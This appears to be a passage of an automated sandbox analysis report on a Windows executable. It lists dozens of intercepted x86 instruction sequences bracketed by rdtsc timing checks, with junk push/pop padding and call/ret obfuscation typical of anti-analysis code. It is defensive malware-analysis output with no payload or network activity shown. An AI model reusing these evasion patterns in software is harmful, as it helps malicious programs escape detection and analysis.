                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948BC2 second address: 948C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jnp 00007F7CC902C406h 0x0000000f push 00000000h 0x00000011 mov edx, dword ptr [ebp+122D29F9h] 0x00000017 push 8131CF15h 0x0000001c pushad 0x0000001d push edi 0x0000001e jp 00007F7CC902C406h 0x00000024 pop edi 0x00000025 jmp 00007F7CC902C416h 0x0000002a popad 0x0000002b add dword ptr [esp], 7ECE316Bh 0x00000032 xor dword ptr [ebp+122D33D9h], eax 0x00000038 push 00000003h 0x0000003a jl 00007F7CC902C40Ch 0x00000040 mov ecx, dword ptr [ebp+122D2839h] 0x00000046 push 00000000h 0x00000048 cld 0x00000049 mov ecx, dword ptr [ebp+122D29EDh] 0x0000004f push 00000003h 0x00000051 mov dword ptr [ebp+122D19D9h], eax 0x00000057 push C52A288Bh 0x0000005c pushad 0x0000005d jc 00007F7CC902C40Ch 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948C38 second address: 948C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948DCE second address: 948E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7CC902C40Fh 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jnl 00007F7CC902C40Ah 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7CC902C40Eh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968884 second address: 96888D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B2B7 second address: 93B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B2BD second address: 93B2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B2C5 second address: 93B2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F7CC902C424h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B2D4 second address: 93B2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC8D8AE38h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B2FC second address: 93B300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96673C second address: 966741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966741 second address: 96674C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7CC902C406h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966A69 second address: 966A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE32h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966A83 second address: 966A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966BC8 second address: 966BDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F7CC8D8AE2Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966BDA second address: 966BFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F7CC902C406h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7CC902C416h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9671E8 second address: 9671EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9675DA second address: 9675DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967773 second address: 9677C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F7CC8D8AE26h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jo 00007F7CC8D8AE2Ah 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F7CC8D8AE38h 0x0000001e push eax 0x0000001f push edx 0x00000020 jc 00007F7CC8D8AE26h 0x00000026 jmp 00007F7CC8D8AE39h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93635D second address: 93637E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jbe 00007F7CC902C406h 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F7CC902C40Bh 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967A6B second address: 967A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F7CC8D8AE26h 0x0000000d jmp 00007F7CC8D8AE30h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967A88 second address: 967A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968173 second address: 968197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F7CC8D8AE26h 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F7CC8D8AE2Dh 0x00000012 popad 0x00000013 pushad 0x00000014 jno 00007F7CC8D8AE26h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9682FB second address: 968308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7CC902C406h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96845D second address: 968476 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jg 00007F7CC8D8AE3Ah 0x00000011 jl 00007F7CC8D8AE2Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F059 second address: 96F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F05D second address: 96F061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F5C2 second address: 96F61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jbe 00007F7CC902C421h 0x00000011 js 00007F7CC902C41Bh 0x00000017 jmp 00007F7CC902C415h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jnl 00007F7CC902C411h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F7CC902C415h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E573 second address: 96E578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F700 second address: 96F705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973FE3 second address: 973FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973FEA second address: 973FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976ABA second address: 976AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97714E second address: 977153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9777B6 second address: 9777DE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7CC8D8AE28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F7CC8D8AE35h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 977BBE second address: 977BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 977C77 second address: 977CB4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7CC8D8AE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F7CC8D8AE28h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D2202h] 0x0000002d push eax 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978CC4 second address: 978CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979C2B second address: 979CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F7CC8D8AE2Ch 0x0000000c jo 00007F7CC8D8AE26h 0x00000012 popad 0x00000013 push eax 0x00000014 push esi 0x00000015 jmp 00007F7CC8D8AE38h 0x0000001a pop esi 0x0000001b nop 0x0000001c mov dword ptr [ebp+122D1B42h], ecx 0x00000022 push 00000000h 0x00000024 mov esi, edi 0x00000026 mov di, 4700h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F7CC8D8AE28h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov esi, 019834A0h 0x0000004b jmp 00007F7CC8D8AE34h 0x00000050 js 00007F7CC8D8AE2Ah 0x00000056 mov si, BD95h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e je 00007F7CC8D8AE26h 0x00000064 jmp 00007F7CC8D8AE37h 0x00000069 popad 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97B148 second address: 97B14E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98059A second address: 9805A4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7CC8D8AE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9805A4 second address: 9805B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F7CC902C406h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9805B2 second address: 9805C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E56E second address: 97E572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9825D1 second address: 9825DB instructions: 0x00000000 rdtsc 0x00000002 je 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9825DB second address: 9825EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7CC902C40Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9825EE second address: 982659 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov di, BFBBh 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov esi, 0EF5AE18h 0x00000017 mov bh, ah 0x00000019 popad 0x0000001a movzx edi, di 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F7CC8D8AE28h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 xor bx, BC00h 0x0000003e xchg eax, esi 0x0000003f jg 00007F7CC8D8AE34h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F7CC8D8AE31h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98349F second address: 9834A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9834A3 second address: 98351E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F7CC8D8AE28h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 push 00000000h 0x00000028 mov ebx, dword ptr [ebp+122D2879h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F7CC8D8AE28h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a pushad 0x0000004b mov dl, ah 0x0000004d sub ax, 808Ch 0x00000052 popad 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F7CC8D8AE38h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984461 second address: 984465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98366C second address: 983672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984465 second address: 9844E6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F7CC902C408h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jc 00007F7CC902C410h 0x0000002e jmp 00007F7CC902C40Ah 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F7CC902C408h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f jmp 00007F7CC902C40Dh 0x00000054 push 00000000h 0x00000056 mov edi, dword ptr [ebp+122D2CACh] 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983672 second address: 983676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983676 second address: 983689 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7CC902C406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983750 second address: 983754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98467D second address: 984681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983754 second address: 983762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F7CC8D8AE26h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984681 second address: 98468D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986741 second address: 986757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7CC8D8AE2Ch 0x0000000a jl 00007F7CC8D8AE26h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 987431 second address: 9874A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7CC902C406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jnc 00007F7CC902C408h 0x00000013 pop ebx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F7CC902C408h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f or dword ptr [ebp+12461261h], ebx 0x00000035 push 00000000h 0x00000037 jmp 00007F7CC902C415h 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+124697FDh], edx 0x00000044 jl 00007F7CC902C408h 0x0000004a mov edi, ecx 0x0000004c xchg eax, esi 0x0000004d jmp 00007F7CC902C40Dh 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986757 second address: 986760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98468D second address: 98473D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 jmp 00007F7CC902C419h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 xor dword ptr [ebp+122D2CB1h], edi 0x0000001a mov ebx, dword ptr [ebp+122D282Dh] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F7CC902C408h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 push edi 0x00000042 mov ebx, dword ptr [ebp+122D2905h] 0x00000048 pop ebx 0x00000049 mov eax, dword ptr [ebp+122D1685h] 0x0000004f xor edi, 27EE4518h 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push esi 0x0000005a call 00007F7CC902C408h 0x0000005f pop esi 0x00000060 mov dword ptr [esp+04h], esi 0x00000064 add dword ptr [esp+04h], 00000016h 0x0000006c inc esi 0x0000006d push esi 0x0000006e ret 0x0000006f pop esi 0x00000070 ret 0x00000071 add di, 41C2h 0x00000076 push eax 0x00000077 jno 00007F7CC902C421h 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007F7CC902C413h 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9874A5 second address: 9874B7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F7CC8D8AE2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988442 second address: 98844F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F7CC902C406h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98844F second address: 988460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F7CC8D8AE26h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A31D second address: 98A321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B227 second address: 98B279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F7CC8D8AE28h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 clc 0x00000024 mov bx, 997Dh 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b mov dword ptr [ebp+1247AE19h], eax 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+122D2AB1h] 0x0000003a xchg eax, esi 0x0000003b jmp 00007F7CC8D8AE2Dh 0x00000040 push eax 0x00000041 pushad 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B279 second address: 98B282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989648 second address: 98964C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98964C second address: 989652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98C300 second address: 98C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E092 second address: 98E0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7CC902C413h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EFEC second address: 98EFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
